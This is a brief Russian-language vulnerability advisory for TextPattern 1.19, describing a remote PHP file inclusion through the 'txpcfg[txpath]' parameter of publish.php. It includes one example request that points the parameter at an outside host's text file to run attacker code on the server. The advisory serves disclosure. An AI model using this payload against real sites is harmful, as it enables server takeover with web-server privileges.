Программа: TextPattern 1.19

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "txpcfg[txpath]" сценарием publish.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://yourtargetsite/[textpattern_g119_path]/textpattern/ publish.php?txpcfg[txpath]=http://attact/colok.txt?

Оставить мнение